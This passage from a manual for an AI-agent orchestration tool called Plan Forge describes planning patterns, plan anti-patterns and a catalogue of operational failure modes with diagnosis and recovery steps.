Slice shape (1 spike + a follow-up build plan):
docs/research/.Gate flavor: the spike's gate is "an ADR or design note exists" (e.g. test -f docs/research/spike-NN-decision.md). Time-box is enforced by reviewing the document and explicitly killing the run if it produced code.
Quorum: power. Spikes benefit from diverse perspectives precisely because the question is open.
Failure modes avoided: spike code accidentally landing in production; spike that produces no decision (just code); spike that bleeds into multi-week exploration without a checkpoint.
Real phases often combine patterns. A typical feature ship might be:
Each phase is a separate plan file, runnable independently, revertable independently, reviewable independently. That's the architectural payoff, small phases compose; mega-phases don't.
Shapes that look like patterns but degrade outcomes. If your plan resembles one of these, refactor the plan before running it.
| Anti-pattern | Why it fails | Refactor to |
|---|---|---|
| Mega-slice (one slice, 20+ files) | Un-reviewable diff; one failure rolls back everything; no useful intermediate state. | Split into per-layer / per-consumer slices, P1 or P4. |
| Test-after (separate slice that only adds tests for code shipped earlier) | Test slice often "happens to pass" because it's written to match observed behavior, not specified behavior. | Move tests into the slice that ships the code (or use P5's strict red-then-green for genuine retrofit). |
| Sweep-only-at-end | All earlier slices appeared green; the sweep at the end discovers cross-slice breakage that's now expensive to localize. | Run sweep as part of every slice's gate (cost: seconds; benefit: bisectability). |
| Plan-as-essay (long prose, vague scope contracts) | Worker treats it as inspiration rather than contract; scope drift becomes the norm. | Use the standard plan template: explicit Scope Contract + Forbidden Actions + per-slice gate command. See the AI Plan Hardening Runbook. |
| Quorum-power for everything | 10× cost without measurable quality lift on routine slices. | Default auto; opt into power per-slice or per-phase where it actually helps. |
| No rollback path (data migration, infra change with no documented revert) | If anything goes wrong post-deploy, you're improvising under stress. | P8 explicitly lists rollback as a slice; P13 requires a no-op step before promote. Add a Notes section to every plan that describes the revert path. |
Common Plan Forge failure modes organized by layer. For each: symptom, diagnosis path, recovery action, and prevention. This appendix is the operator's companion to Appendix X — Errors & Exit Codes: Appendix X lists what the system says; Appendix Z lists what to do.
forge_diagnose tool and the /health-check skill cover most cases automatically, this catalog is for when you need to understand why the automation suggests what it does.
Symptom: worker response truncated mid-sentence or mid-tool-call; error like max_tokens reached or HTTP 200 with finish_reason: length.
Diagnosis: check forge_watch_live for the slice's input + output token counts; compare to the model's context window. Most often the prompt grew beyond budget after a few file reads.
Recovery: split the slice. The scope was too broad. Re-run with a tighter file list. If splitting isn't practical, switch the slice's model to one with a larger context (Opus 1M, GPT-5.5).
Prevention: target 1–4 files per slice; use scope contracts; let auto quorum route bigger slices to larger-context models.
Symptom: orchestrator waits past the configured provider.timeoutMs and aborts. Status reason: worker-signaled or provider-timeout.
Diagnosis: provider status page; forge_watch_live shows the last successful token timestamp. If the model was streaming and then stopped, the network broke. If it never streamed, the provider is overloaded.
Recovery: pforge run-plan --resume-from <slice>. The retry will use the same prompt; provider issues are usually transient. If repeated, switch provider via --model.
Prevention: keep the provider list in .forge.json#modelRouting.fallback populated so auto mode can fail over without manual intervention.
Symptom: model returns a tool-call block with invalid JSON, wrong argument types, or a tool name that doesn't exist. Orchestrator surfaces tool-call-invalid.
Diagnosis: inspect .forge/runs/<runId>/trajectory.jsonl for the raw tool-call frame.
Recovery: the orchestrator retries with the parse error fed back to the model. If 3 retries fail, the slice errors. Manual fix: tighten the tool's inputSchema in the MCP server so the model gets a clearer contract on the next attempt.
Prevention: follow the forge_search ACI gold standard for new tools, bounded payloads, sparse fields, explicit schemas, friendly empty-state messages.
Symptom: PreToolUse hook fires; worker's edit is rejected with scope-violation or forbidden-action. Slice fails or worker pivots to a different file.
Diagnosis: read the hook's output line, it names the file and the rule. Compare against the plan's Scope Contract and Forbidden Actions sections.
Recovery: two paths. (a) If the worker was wrong (genuine scope creep), let the block stand, the system is working as designed. (b) If the plan was too narrow (the legitimate fix requires touching a file the scope doesn't allow), edit the plan to widen scope, file a plan-defect meta-bug, then resume.
Prevention: write Scope Contracts that match the slice's true file set. Underscoped plans are the #1 source of FM4. See the AI Plan Hardening Runbook for scope-sizing guidance.
Symptom: the worker calls the same tool with the same arguments N times in a row, or alternates between two tool calls indefinitely. Orchestrator emits loop-detected and aborts the slice.
Diagnosis: trajectory.jsonl shows the repeating pattern. Common cause: the model is reading a file, "concluding," then reading it again because no progress was made.
Recovery: abort with forge_abort if not already aborted. Split the slice or give the worker a clearer next-step instruction in the plan. If the loop is between two specific tools, check whether one of them has an ambiguous empty-state message (see Appendix X — MCP tool errors).
Prevention: ACI hygiene, tools must return friendly messages on empty results, not bare { hits: [] }.
Symptom: gate command exits non-zero; test runner reports failed assertions.
Diagnosis: read the gate output. The orchestrator's retry loop will feed the failure back to the worker and let it try again (up to execution.maxRetries).
Recovery: let the retry happen. If it still fails after retries, the slice's gate is the truth, the implementation is wrong. Triage: is the test correct? Is the implementation incomplete? Is the test too strict?
Prevention: tight, fast gates that fail with clear error messages. Loose gates pass bad work; cryptic gates leave the worker spinning.
Symptom: gate runs past the configured timeout (default 120s); orchestrator kills it. Status reason: gate-timeout.
Diagnosis: was the test suite legitimately too big, or did a test hang? Try running the gate command manually; observe time-to-completion.
Recovery: if legitimate, raise the timeout for that slice in the plan's per-slice gateTimeoutMs. If a hang, fix the test (often a missing mock for an async call or an unbounded retry loop).
Prevention: gates should run in <30s ideally, <60s comfortably. Slice-level gates that need to run a 5-minute suite are usually a smell, consider running the small slice gate plus a separate periodic sweep.
Symptom: gate passes on the plan author's machine but fails on another platform (typically Windows). Common: bash pipe-to-brace-group like grep -c | { read n; [ "$n" -ge 1 ]; } where the inner variable is invisible through the cmd→bash shim.
Diagnosis: gate output shows the failure on the second machine; manual run of the gate command reproduces it.
Recovery: rewrite the gate to use simple, portable shell. Prefer grep -q PATTERN file and test -f path over complex pipe-fests. Avoid pipe-to-brace-group; use intermediate files if you need to capture counts.
Prevention: see AI Plan Hardening Runbook — portable gate commands.
Symptom: gate validator (e.g. node docs/manual/maintain.mjs) reports drift: orphan files, missing index entries, broken cross-refs.
Diagnosis: the validator output lists every drift item. Typical: a new file was created but not registered in the index SEARCH_SECTIONS array.
Recovery: run the validator twice. The first pass detects drift and auto-regenerates derived files (book-index, list-of-figures, glossary). The second pass confirms convergence. If the second pass still shows drift, fix manually (usually a missing manual.js registration).
Prevention: P12 (Documentation Phase) pattern in Appendix Y mandates the twice-validate gate.
Symptom: orchestrator can't launch the worker subprocess; exits with worker-spawn-failed. On Windows: ENOENT from spawn.
Diagnosis: usually a missing CLI on PATH (e.g. claude, cursor-agent, codex). Run pforge smith, it lists which agent CLIs are present.
Recovery: install or reinstall the worker CLI; verify with where claude (Windows) / which claude (POSIX). On Windows, restart the IDE after PATH changes, child-process PATH is inherited at spawn time.
Prevention: pforge smith in your project's preflight; /health-check skill on session start.
Symptom: failed slice rolled back; git stash pop reports merge conflicts because foreign files were modified during the run.
Diagnosis: git status shows conflict markers in files the slice was not supposed to touch.
Recovery: resolve conflicts manually, then drop the stash with git stash drop. The v3.3.4 / v3.3.5 fixes addressed the most common shapes of this (snapshot-apply-then-drop ordering); if you hit it on a current Plan Forge version, file an orchestrator-defect meta-bug.
Prevention: don't make manual edits while a plan is running. The orchestrator's snapshot model assumes the working tree is stable during execution.
Symptom: orchestrator can't apply the pre-slice snapshot to roll back a failed slice. Status reason: snapshot-apply-failed.
Diagnosis: .forge/runs/<runId>/snapshots/ contains the snapshot artifacts; inspect git output for the actual failure (usually a file-permission issue or a concurrent index lock).
Recovery: manually restore from the snapshot or from the prior git commit. git reflog shows the orchestrator's commits; git reset --hard <sha> to the pre-slice state if necessary.
Prevention: ensure no other git operations are running against the repo during plan execution; close other IDE windows that might be touching the index.
Symptom: pforge run-plan exits with code 2 (EX_USAGE) and a plan-parse error. Common: duplicate slice headers, missing required sections, malformed bash gate fences.
Diagnosis: error message names the line. pforge check <plan> validates standalone.
Recovery: fix the markdown. Common issues: two slices with the same heading text; gate code-fence not closed; ### Slice N heading without a following body.
Prevention: run pforge check before pforge run-plan; the Crucible's plan-hardening pass (Session 1) catches most parse errors before they reach execution.
Symptom: provider returns 429; orchestrator surfaces provider-rate-limit.
Diagnosis: check provider's rate-limit headers (x-ratelimit-remaining-requests, x-ratelimit-reset-*). Are you over your tier's per-minute or per-day cap?
Recovery: the orchestrator backs off and retries automatically (configurable in .forge.json#execution.backoff). Manual: switch to a different provider via --model until the window resets, or upgrade your provider tier.
Prevention: spread load across providers via modelRouting.fallback; reserve power quorum for slices that actually need it (each panelist counts against the rate limit).
Symptom: 500/502/503 from provider; sustained failures over multiple retries.
Diagnosis: check the provider's status page. If a single provider is degraded, fail over.
Recovery: pforge run-plan --resume-from <slice> --model <different-provider>. Multi-provider routing in auto mode handles this automatically when configured.
Prevention: maintain keys for at least two providers (Anthropic + OpenAI is the common pairing). The marginal cost of having a fallback key configured is zero until you need it.
Symptom: provider returns 401/403; or gh auth login token expired (relevant for Copilot routing).
Diagnosis: pforge smith reports auth status per provider. For GitHub Copilot: gh auth status.
Recovery: rotate the API key (env var or .forge/secrets.json); for OAuth: gh auth login again. Resume the plan.
Prevention: rotate keys before they expire; for OAuth, the LiveGuard preDeploy hook can be extended to call gh auth status as part of its checks.
Symptom: forge_memory_report errors with JSON parse exception; memory search returns empty.
Diagnosis: open .forge/memory/L2.jsonl; look for a truncated last line (write interrupted by crash).
Recovery: remove the corrupt line. Re-run forge_memory_report to verify. The file is append-only jsonl, recovery is just trim-the-last-line.
Prevention: don't kill the orchestrator mid-write. The flush-on-write design minimizes the window, but it's not zero.
Symptom: memory_recall calls timing out; OpenBrain (or your configured L3) not responding.
Diagnosis: curl the configured memory.l3Endpoint; check network and auth token.
Recovery: L3 is opt-in and the orchestrator falls back to L2-only when L3 is down. No slice should fail because L3 is unreachable. If a slice does, the worker is over-relying on L3 hints, tighten the plan instruction set to make L3 advisory rather than required.
Prevention: treat L3 as a hint surface, not a contract. The plan should be runnable with L3 off.
Symptom: PreToolUse blocks an edit that the plan's scope actually allows; or LiveGuard preDeploy flags a "secret" that's a placeholder constant.
Diagnosis: hook output names the rule. Inspect the rule's pattern; compare against the actual content.
Recovery: tighten the pattern (forge_secret_scan ignores patterns are configurable). For scope hooks, widen the Scope Contract in the plan.
Prevention: tune secret-scan ignore patterns when you add codebase-specific constants that match common secret shapes (e.g. fixture IDs that look like API keys).
Symptom: a hook script exits non-zero with an actual scripting error (not a policy denial).
Diagnosis: hook output includes the script's stderr. Most common: pwsh-vs-bash mismatch on the wrong platform.
Recovery: fix the script; run it manually to verify. Hook scripts live in .github/hooks/<Event>.md with code fences for each platform.
Prevention: keep both bash and pwsh blocks for every hook; /health-check exercises hooks during smoke testing.
Symptom: quorum panel returns; no answer reaches the configured threshold. Slice fails with quorum-no-consensus.
Diagnosis: forge_quorum_analyze on the run id shows each panelist's answer; look for fundamental disagreement (different APIs proposed, different architectural choices) vs near-misses on wording.
Recovery: split the slice into a P14 (Spike) plus a build slice. The disagreement signal is the panel telling you the question is ambiguous, resolve the ambiguity at the plan level, not by re-running the same quorum.
Prevention: clearer slice prompts; tighter Scope Contracts. Quorum disagreement is usually a plan-quality signal.
Symptom: one or more panelists fail to respond before the per-panelist timeout. Quorum either proceeds with fewer voices (if remaining count ≥ threshold) or fails.
Diagnosis: trajectory.jsonl shows which panelist timed out and at what stage.
Recovery: if quorum failed due to insufficient responders, retry with --quorum=auto (smaller panel, less rate-limit risk) or after the timed-out provider recovers.
Prevention: configure .forge.json#quorum.panelistTimeoutMs to a value your slowest provider tolerates; for cost-sensitive workflows, prefer auto over power, fewer panelists = fewer timeout opportunities.
Symptom: hub or MCP server can't bind to 3100/3101/3102; exits with EADDRINUSE.
Diagnosis: a previous Plan Forge process didn't shut down cleanly, or another tool grabbed the port. On Windows: netstat -ano | findstr :3100; on POSIX: lsof -i :3100.
Recovery: kill the stale process by PID. pforge smith detects orphan processes and offers to clean them up.
Prevention: shut down cleanly (Ctrl+C, not kill -9). The orchestrator releases its ports on SIGTERM but not on SIGKILL.
Symptom: writes to .forge/runs/<runId>/trajectory.jsonl or .forge/cost-history.json fail; orchestrator errors with ENOSPC.
Diagnosis: df -h . (POSIX) / Get-PSDrive (Windows). Trajectory files can grow large for long runs.
Recovery: clear old runs, .forge/runs/ can be aggressively pruned; only keep recent traces. Cost history is small (JSONL one row per LLM call).
Prevention: configure .forge.json#execution.trajectoryRetentionDays (default 30) to a value your disk tolerates.
Symptom: write fails with EBUSY or EPERM; common when an editor, antivirus, or sync client (OneDrive / Dropbox) is holding the file.
Diagnosis: Get-Process | Where { $_.Modules.FileName -contains $path } in pwsh; or use Process Explorer's "Find Handle" feature.
Recovery: close the editor / sync client; the orchestrator's retry loop usually picks up the file on the next attempt. For persistent locks, exclude .forge/ from sync-client scope and antivirus realtime scanning.
Prevention: put working repos outside synced folders when possible; add .forge/ to OneDrive / Dropbox exclusion lists.
When in doubt, the following are safe in any failure mode:
pforge smith, environment diagnostic; reports installed CLIs, configured providers, port status, disk space./health-check skill, forge_smith → forge_validate → forge_sweep in sequence.forge_diagnose, per-run diagnosis with structured remediation suggestions.pforge run-plan --resume-from <slice>, resumes a failed run at a specific slice, preserving prior committed slices.git reflog + git reset --hard, ultimate rollback to any prior orchestrator commit.forge_meta_bug_file, if you worked around a Plan Forge defect, file it so the fix lands upstream. See self-repair reporting.scope-violation, gate-timeout, etc.).